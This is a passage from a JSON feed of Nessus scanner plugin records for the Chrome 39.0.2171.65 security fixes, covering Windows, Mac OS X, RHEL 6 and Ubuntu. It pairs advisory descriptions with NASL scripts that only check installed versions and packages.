extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T03:21:29", "description": "The version of Google Chrome installed on the remote Windows host is a\nversion prior to 39.0.2171.65. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A double-free vulnerability exists in the version of\n Adobe Flash bundled with Chrome which could result in\n arbitrary code execution. (CVE-2014-0574)\n\n - An unspecified address bar spoofing vulnerability\n exists which could be used to aid in phishing attacks.\n (CVE-2014-7899)\n\n - Multiple use-after-free vulnerabilities exist in pdfium\n which could result in arbitrary code execution.\n (CVE-2014-7900, CVE-2014-7902)\n\n - Integer overflow vulnerabilities exist in pdfium and\n the media component which could result in arbitrary\n code execution. (CVE-2014-7901, CVE-2014-7908)\n\n - Buffer overflow vulnerabilities exist in pdfium and\n Skia which could result in arbitrary code execution.\n (CVE-2014-7903, CVE-2014-7904)\n\n - Use-after-free vulnerabilities exist in Pepper plugins\n and Blink which could result in arbitrary code\n execution. (CVE-2014-7906, CVE-2014-7907)\n\n - An unspecified uninitialized memory read exists.\n (CVE-2014-7909)\n\n - Multiple unspecified vulnerabilities exist.\n (CVE-2014-7910)", "edition": 26, "published": "2014-11-19T00:00:00", "title": "Google Chrome < 39.0.2171.65 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0574", "CVE-2014-7899", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7901", "CVE-2014-7903", "CVE-2014-7910", "CVE-2014-7902", "CVE-2014-7900"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_39_0_2171_65.NASL", "href": "https://www.tenable.com/plugins/nessus/79336", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79336);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-0574\",\n \"CVE-2014-7899\",\n \"CVE-2014-7900\",\n \"CVE-2014-7901\",\n \"CVE-2014-7902\",\n \"CVE-2014-7903\",\n \"CVE-2014-7904\",\n \"CVE-2014-7906\",\n \"CVE-2014-7907\",\n \"CVE-2014-7908\",\n \"CVE-2014-7909\",\n \"CVE-2014-7910\"\n );\n script_bugtraq_id(\n 71041,\n 71158,\n 71159,\n 71160,\n 71161,\n 71163,\n 71164,\n 71165,\n 71166,\n 71167,\n 71168,\n 71170\n );\n\n script_name(english:\"Google Chrome < 39.0.2171.65 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is a\nversion prior to 39.0.2171.65. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A double-free vulnerability exists in the version of\n Adobe Flash bundled with Chrome which could result in\n arbitrary code execution. (CVE-2014-0574)\n\n - An unspecified address bar spoofing vulnerability\n exists which could be used to aid in phishing attacks.\n (CVE-2014-7899)\n\n - Multiple use-after-free vulnerabilities exist in pdfium\n which could result in arbitrary code execution.\n (CVE-2014-7900, CVE-2014-7902)\n\n - Integer overflow vulnerabilities exist in pdfium and\n the media component which could result in arbitrary\n code execution. (CVE-2014-7901, CVE-2014-7908)\n\n - Buffer overflow vulnerabilities exist in pdfium and\n Skia which could result in arbitrary code execution.\n (CVE-2014-7903, CVE-2014-7904)\n\n - Use-after-free vulnerabilities exist in Pepper plugins\n and Blink which could result in arbitrary code\n execution. (CVE-2014-7906, CVE-2014-7907)\n\n - An unspecified uninitialized memory read exists.\n (CVE-2014-7909)\n\n - Multiple unspecified vulnerabilities exist.\n (CVE-2014-7910)\");\n # http://googlechromereleases.blogspot.com/2014/11/stable-channel-update_18.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bc00508c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 39.0.2171.65 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0574\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'39.0.2171.65', severity:SECURITY_HOLE, xss:FALSE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T03:48:28", "description": "The version of Google Chrome installed on the remote Mac OS X host is\na version prior to 39.0.2171.65. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A double-free vulnerability exists in the version of\n Adobe Flash bundled with Chrome which could result in\n arbitrary code execution. (CVE-2014-0574)\n\n - An unspecified address bar spoofing vulnerability\n exists which could be used to aid in phishing attacks.\n (CVE-2014-7899)\n\n - Multiple use-after-free vulnerabilities exist in pdfium\n which could result in arbitrary code execution.\n (CVE-2014-7900, CVE-2014-7902)\n\n - Integer overflow vulnerabilities exist in pdfium and\n the media component which could result in arbitrary\n code execution. (CVE-2014-7901, CVE-2014-7908)\n\n - Buffer overflow vulnerabilities exist in pdfium and\n Skia which could result in arbitrary code execution.\n (CVE-2014-7903, CVE-2014-7904)\n\n - Use-after-free vulnerabilities exist in Pepper plugins\n and Blink which could result in arbitrary code\n execution. (CVE-2014-7906, CVE-2014-7907)\n\n - An unspecified uninitialized memory read exists.\n (CVE-2014-7909)\n\n - Multiple unspecified vulnerabilities exist.\n (CVE-2014-7910)", "edition": 26, "published": "2014-11-19T00:00:00", "title": "Google Chrome < 39.0.2171.65 Multiple Vulnerabilities (Mac OS X)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0574", "CVE-2014-7899", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7901", "CVE-2014-7903", "CVE-2014-7910", "CVE-2014-7902", "CVE-2014-7900"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_39_0_2171_65.NASL", "href": "https://www.tenable.com/plugins/nessus/79337", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79337);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-0574\",\n \"CVE-2014-7899\",\n \"CVE-2014-7900\",\n \"CVE-2014-7901\",\n \"CVE-2014-7902\",\n \"CVE-2014-7903\",\n \"CVE-2014-7904\",\n \"CVE-2014-7906\",\n \"CVE-2014-7907\",\n \"CVE-2014-7908\",\n \"CVE-2014-7909\",\n \"CVE-2014-7910\"\n );\n script_bugtraq_id(\n 71041,\n 71158,\n 71159,\n 71160,\n 71161,\n 71163,\n 71164,\n 71165,\n 71166,\n 71167,\n 71168,\n 71170\n );\n\n script_name(english:\"Google Chrome < 39.0.2171.65 Multiple Vulnerabilities (Mac OS X)\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\na version prior to 39.0.2171.65. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A double-free vulnerability exists in the version of\n Adobe Flash bundled with Chrome which could result in\n arbitrary code execution. (CVE-2014-0574)\n\n - An unspecified address bar spoofing vulnerability\n exists which could be used to aid in phishing attacks.\n (CVE-2014-7899)\n\n - Multiple use-after-free vulnerabilities exist in pdfium\n which could result in arbitrary code execution.\n (CVE-2014-7900, CVE-2014-7902)\n\n - Integer overflow vulnerabilities exist in pdfium and\n the media component which could result in arbitrary\n code execution. (CVE-2014-7901, CVE-2014-7908)\n\n - Buffer overflow vulnerabilities exist in pdfium and\n Skia which could result in arbitrary code execution.\n (CVE-2014-7903, CVE-2014-7904)\n\n - Use-after-free vulnerabilities exist in Pepper plugins\n and Blink which could result in arbitrary code\n execution. (CVE-2014-7906, CVE-2014-7907)\n\n - An unspecified uninitialized memory read exists.\n (CVE-2014-7909)\n\n - Multiple unspecified vulnerabilities exist.\n (CVE-2014-7910)\");\n # http://googlechromereleases.blogspot.com/2014/11/stable-channel-update_18.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bc00508c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 39.0.2171.65 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0574\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'39.0.2171.65', severity:SECURITY_HOLE, xss:FALSE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:15:11", "description": "Updated chromium-browser packages that fix multiple security issues\nare now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Chromium to crash\nor, potentially, execute arbitrary code with the privileges of the\nuser running Chromium. (CVE-2014-7904, CVE-2014-7906, CVE-2014-7907,\nCVE-2014-7910, CVE-2014-7908, CVE-2014-7909)\n\nA flaw was found in the way Chromium parsed certain URL values. A\nmalicious attacker could use this flaw to perform phishing attacks.\n(CVE-2014-7899)\n\nAll Chromium users should upgrade to these updated packages, which\ncontain Chromium version 39.0.2171.65, which corrects these issues.\nAfter installing the update, Chromium must be restarted for the\nchanges to take effect.", "edition": 22, "published": "2014-11-25T00:00:00", "title": "RHEL 6 : chromium-browser (RHSA-2014:1894)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7899", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7910"], "modified": "2014-11-25T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo", "cpe:/o:redhat:enterprise_linux:6.7", "cpe:/o:redhat:enterprise_linux:6.6", "p-cpe:/a:redhat:enterprise_linux:chromium-browser", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2014-1894.NASL", "href": "https://www.tenable.com/plugins/nessus/79426", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1894. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79426);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-7899\", \"CVE-2014-7904\", \"CVE-2014-7906\", \"CVE-2014-7907\", \"CVE-2014-7908\", \"CVE-2014-7909\", \"CVE-2014-7910\");\n script_bugtraq_id(71159, 71160, 71161, 71166, 71167, 71168, 71170);\n script_xref(name:\"RHSA\", value:\"2014:1894\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2014:1894)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Updated chromium-browser packages that fix multiple security issues\nare now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Chromium to crash\nor, potentially, execute arbitrary code with the privileges of the\nuser running Chromium. (CVE-2014-7904, CVE-2014-7906, CVE-2014-7907,\nCVE-2014-7910, CVE-2014-7908, CVE-2014-7909)\n\nA flaw was found in the way Chromium parsed certain URL values. A\nmalicious attacker could use this flaw to perform phishing attacks.\n(CVE-2014-7899)\n\nAll Chromium users should upgrade to these updated packages, which\ncontain Chromium version 39.0.2171.65, which corrects these issues.\nAfter installing the update, Chromium must be restarted for the\nchanges to take effect.\"\n );\n # https://googlechromereleases.blogspot.com/2014/11/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://chromereleases.googleblog.com/2014/11/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:1894\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-7899\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-7904\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-7906\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-7907\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-7910\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-7908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-7909\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1894\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-39.0.2171.65-2.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-39.0.2171.65-2.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-debuginfo-39.0.2171.65-2.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-39.0.2171.65-2.el6_6\", allowmaj:TRUE)) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T15:28:01", "description": "A buffer overflow was discovered in Skia. If a user were tricked in to\nopening a specially crafted website, an attacked could potentially\nexploit this to cause a denial of service via renderer crash or\nexecute arbitrary code with the privileges of the sandboxed render\nprocess. (CVE-2014-7904)\n\nMultiple use-after-frees were discovered in Blink. If a user were\ntricked in to opening a specially crafted website, an attacked could\npotentially exploit these to cause a denial of service via renderer\ncrash or execute arbitrary code with the privileges of the sandboxed\nrender process. (CVE-2014-7907)\n\nAn integer overflow was discovered in media. If a user were tricked in\nto opening a specially crafted website, an attacked could potentially\nexploit this to cause a denial of service via renderer crash or\nexecute arbitrary code with the privileges of the sandboxed render\nprocess. (CVE-2014-7908)\n\nAn uninitialized memory read was discovered in Skia. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit this to cause a denial of service via renderer\ncrash. (CVE-2014-7909)\n\nMultiple security issues were discovered in Chromium. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit these to read uninitialized memory, cause a denial\nof service via application crash or execute arbitrary code with the\nprivileges of the user invoking the program. (CVE-2014-7910).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2014-11-20T00:00:00", "title": "Ubuntu 14.04 LTS / 14.10 : oxide-qt vulnerabilities (USN-2410-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7908", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7910"], "modified": "2014-11-20T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:oxideqt-codecs", "p-cpe:/a:canonical:ubuntu_linux:oxideqt-codecs-extra", "cpe:/o:canonical:ubuntu_linux:14.10", "p-cpe:/a:canonical:ubuntu_linux:liboxideqtcore0", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2410-1.NASL", "href": "https://www.tenable.com/plugins/nessus/79354", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2410-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79354);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-7904\", \"CVE-2014-7907\", \"CVE-2014-7908\", \"CVE-2014-7909\", \"CVE-2014-7910\");\n script_bugtraq_id(71161, 71166, 71167, 71168, 71170);\n script_xref(name:\"USN\", value:\"2410-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 14.10 : oxide-qt vulnerabilities (USN-2410-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow was discovered in Skia. If a user were tricked in to\nopening a specially crafted website, an attacked could potentially\nexploit this to cause a denial of service via renderer crash or\nexecute arbitrary code with the privileges of the sandboxed render\nprocess. (CVE-2014-7904)\n\nMultiple use-after-frees were discovered in Blink. If a user were\ntricked in to opening a specially crafted website, an attacked could\npotentially exploit these to cause a denial of service via renderer\ncrash or execute arbitrary code with the privileges of the sandboxed\nrender process. (CVE-2014-7907)\n\nAn integer overflow was discovered in media. If a user were tricked in\nto opening a specially crafted website, an attacked could potentially\nexploit this to cause a denial of service via renderer crash or\nexecute arbitrary code with the privileges of the sandboxed render\nprocess. (CVE-2014-7908)\n\nAn uninitialized memory read was discovered in Skia. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit this to cause a denial of service via renderer\ncrash. (CVE-2014-7909)\n\nMultiple security issues were discovered in Chromium. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit these to read uninitialized memory, cause a denial\nof service via application crash or execute arbitrary code with the\nprivileges of the user invoking the program. (CVE-2014-7910).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2410-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected liboxideqtcore0, oxideqt-codecs and / or\noxideqt-codecs-extra packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:liboxideqtcore0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:oxideqt-codecs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:oxideqt-codecs-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|14\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 14.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"liboxideqtcore0\", pkgver:\"1.3.4-0ubuntu0.14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"oxideqt-codecs\", pkgver:\"1.3.4-0ubuntu0.14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"oxideqt-codecs-extra\", pkgver:\"1.3.4-0ubuntu0.14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"liboxideqtcore0\", pkgver:\"1.3.4-0ubuntu0.14.10.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"oxideqt-codecs\", pkgver:\"1.3.4-0ubuntu0.14.10.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"oxideqt-codecs-extra\", pkgver:\"1.3.4-0ubuntu0.14.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"liboxideqtcore0 / oxideqt-codecs / oxideqt-codecs-extra\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:56:36", "description": "The remote host is affected by the vulnerability described in GLSA-201412-13\n(Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered 